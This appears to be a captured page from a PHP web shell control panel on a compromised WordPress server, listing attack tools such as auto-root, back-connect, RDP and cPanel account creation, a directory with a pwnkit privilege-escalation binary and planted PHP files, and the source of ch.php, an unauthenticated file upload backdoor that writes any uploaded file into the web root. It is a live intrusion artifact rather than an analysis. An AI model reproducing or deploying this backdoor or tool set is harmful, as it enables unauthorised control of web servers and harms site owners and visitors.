Linux vmi2114108.contaboserver.net 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 194.233.74.117 | : 216.73.216.221
92 Domain
8.2.30
diaspora
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
diaspora /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
231
B
-rw-r--r--
ch.php
1.4
KB
-rw-r--r--
cjbycwee.php
1.4
KB
-rw-r--r--
error_log
3.09
KB
-rw-r--r--
index.html
27.36
KB
-rw-r--r--
index.php
186
B
-rw-r--r--
php.ini
581
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme.html
7.25
KB
-rw-r--r--
robots.txt.sorry
2.5
KB
-rw-r--r--
sc.php
177.99
KB
-rw-r--r--
tools.php
72.46
KB
-rw-r--r--
wp-activate.php
7.21
KB
-rw-r--r--
wp-blog-header.php
351
B
-rw-r--r--
wp-config.php
4.76
KB
-rw-rw-rw-
wp-links-opml.php
2.44
KB
-rw-r--r--
wp-login.php
50.21
KB
-rw-r--r--
wp-mail.php
8.52
KB
-rw-r--r--
wp-settings.php
29.38
KB
-rw-r--r--
wp-signup.php
33.71
KB
-rw-r--r--
wp-sx9.php
457
B
-rw-r--r--
wp-trackback.php
4.98
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ch.php
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Upload</title> <style> #bar{ width:100%; background:#ddd; margin-top:10px; } #bar div{ width:0%; height:25px; background:green; color:#fff; text-align:center; line-height:25px; } </style> </head> <body> <form id="uploadForm"> <input type="file" name="file" required> <button type="submit">Upload</button> </form> <div id="bar"> <div>0%</div> </div> <script> document.getElementById("uploadForm").onsubmit = function(e){ e.preventDefault(); let data = new FormData(this); let xhr = new XMLHttpRequest(); xhr.upload.onprogress = function(e){ if(e.lengthComputable){ let percent = (e.loaded / e.total) * 100; let bar = document.querySelector("#bar div"); bar.style.width = percent + "%"; bar.innerHTML = Math.floor(percent) + "%"; } }; xhr.onload = function(){ alert(xhr.responseText); }; xhr.open("POST","",true); xhr.send(data); }; </script> <?php if($_SERVER['REQUEST_METHOD'] == 'POST'){ $name = basename($_FILES['file']['name']); if(move_uploaded_file($_FILES['file']['tmp_name'], $name)){ echo "UPLOAD DONE"; }else{ echo "UPLOAD ERROR"; } exit; } ?> </body> </html>
Close